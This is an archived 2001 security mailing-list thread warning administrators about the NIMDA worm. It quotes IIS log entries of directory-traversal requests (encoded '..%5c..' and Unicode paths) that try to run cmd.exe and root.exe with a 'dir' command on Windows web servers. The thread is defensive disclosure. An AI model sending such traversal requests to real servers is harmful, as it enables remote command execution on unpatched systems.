|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Arnold, Paul (parnold
CURAGEN.COM)Date: Wed Sep 19 2001 - 00:28:28 CDT
It's called NIMDA
http://www.mcafeeb2b.com/
Or
http://slashdot.org/article.pl?sid=01/09/18/151203&mode=nested
Or
http://www.newsbytes.com/news/01/170225.html
Or
mm.html">http://www.sarc.com/avcenter/venc/data/w32.nimda.amm.html
or
http://www.infoworld.com/cgi-bin/fixup.pl?story=http://www.infoworld.com/art
icles/hn/xml/01/09/18/010918hnnimdanews.xml&dctag=security
It's nasty - and quick.
HTH
Paul
-----Original Message-----
From: John Howie [mailto:JHowieMSN.COM]
Sent: Tuesday, September 18, 2001 2:33 PM
To: win2ksecadviceLISTSERV.NTSECURITY.NET
Subject: New attack pattern
Folks,
I have started seeing the following in my IIS logs, starting earlier today.
I am getting hit constantly from various sources. I advise you to check your
IIS boxes to see if you, or any of the servers you know, has been
compromised.
john...
2001-09-18 13:21:25 216.210.XXX.XXX- 192.168.1.251 80
GET /scripts/root.exe /c+dir 404 -
2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80
GET /MSADC/root.exe /c+dir 404 -
2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80
GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80
GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
-
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80
GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 500 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80
GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 404 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80
GET
/msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe
/c+dir 500 - 2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET
/scripts/..Á ../winnt/system32/cmd.exe /c+dir 500
-
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80
GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80
GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
-
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
-
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
-
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80
GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500
-
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND
ALL COMMANDS TO: listservlistserv.ntsecurity.net
LEGAL NOTICE - Unless expressly stated otherwise, this message is
confidential and may be privileged. It is intended for the addressee(s)
only. Access to this e-mail by anyone else is unauthorized. If you are not
an addressee, any disclosure or copying of the contents or any action taken
(or not taken) in reliance on it is unauthorized and may be unlawful. If you
are not an addressee, please inform the sender immediately.
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]